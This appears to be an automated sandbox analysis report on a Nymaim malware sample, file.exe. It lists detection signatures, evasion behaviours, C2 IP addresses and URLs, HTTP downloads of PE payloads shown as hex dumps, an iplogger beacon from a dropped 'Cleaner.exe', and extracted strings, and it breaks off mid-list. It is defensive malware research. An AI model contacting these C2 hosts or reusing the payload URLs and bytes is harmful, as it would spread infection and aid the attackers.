# Windows Analysis Report file.exe

## Overview

### General Information

 Sample Name: file.exe Analysis ID: 715150 MD5: a3b774ed5023f56970eea0668ae65703 SHA1: 3aebfec7980d1db1edbeccbb29044ea677be304b SHA256: f4f6bcce8531ffa055776e57b0f650b7f87049808e3b29d65fab79ec841ed81c Tags: exe Infos:

### Detection

Nymaim
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Nymaim
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
May check the online IP address of the machine
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

### AV Detection

 Source: file.exe ReversingLabs: Detection: 47%
 Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte URL Reputation: Label: malware Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte URL Reputation: Label: malware Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst URL Reputation: Label: malware Source: http://171.22.30.106/library.php URL Reputation: Label: malware
 Source: http://85.31.46.167/software.phpZ Virustotal: Detection: 5% Perma Link
 Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1] ReversingLabs: Detection: 28%
 Source: file.exe Joe Sandbox ML: detected
 Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Nymaim {"C2 addresses": ["208.67.104.97", "85.31.46.167"]}
 Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
 Source: unknown HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49723 version: TLS 1.2
 Source: Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe Source: Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe

### Networking

 Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe DNS query: name: iplogger.org
 Source: Malware configuration extractor IPs: 208.67.104.97 Source: Malware configuration extractor IPs: 85.31.46.167
 Source: Joe Sandbox View ASN Name: GRAYSON-COLLIN-COMMUNICATIONSUS GRAYSON-COLLIN-COMMUNICATIONSUS
 Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
 Source: Joe Sandbox View IP Address: 148.251.234.83 148.251.234.83 Source: Joe Sandbox View IP Address: 148.251.234.83 148.251.234.83
 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:32:32 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="dll";Content-Transfer-Encoding: binaryContent-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:32:33 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="soft";Content-Transfer-Encoding: binaryContent-Length: 3947920Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2
 Source: global traffic HTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive
 Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
 Source: unknown TCP traffic detected without corresponding DNS query: 208.67.104.97 Source: unknown TCP traffic detected without corresponding DNS query: 208.67.104.97 Source: unknown TCP traffic detected without corresponding DNS query: 208.67.104.97 Source: unknown TCP traffic detected without corresponding DNS query: 208.67.104.97 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167 Source: unknown TCP traffic detected without corresponding DNS query: 85.31.46.167
 Source: file.exe, 00000000.00000000.306032693.000000000019B000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.php Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.php$Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpCoo Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpO Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpP Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpZ Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpl Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpll Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpstem32 Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.31.46.167/software.phpx Source: Cleaner.exe, 00000021.00000002.650563112.0000024B1A9C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 Source: Cleaner.exe, 00000021.00000003.379618679.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.378593000.0000024B7E185000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.383731927.0000024B7E1C4000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.379712996.0000024B7E18F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://en.w Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com Source: Cleaner.exe, 00000021.00000002.645497591.0000024B00418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://iplogger.org Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name Source: Amcache.hve.30.dr String found in binary or memory: http://upx.sf.net Source: Cleaner.exe, 00000021.00000003.396394419.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395554408.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.396105393.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395852274.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.agfamonotype. Source: Cleaner.exe, 00000021.00000003.382564725.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: Cleaner.exe, 00000021.00000003.387478626.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.387275120.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmled. Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174 Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com Source: Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers Source: Cleaner.exe, 00000021.00000003.391036732.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/ Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/? Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8 Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers? Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG Source: Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designerseK Source: Cleaner.exe, 00000021.00000003.391186193.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersers Source: Cleaner.exe, 00000021.00000003.391552464.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersp Source: Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405489220.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.409086991.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405791697.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersrsivo Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: Cleaner.exe, 00000021.00000003.387130957.0000024B7E1C3000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr String found in binary or memory: https://g-cleanit.hk Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 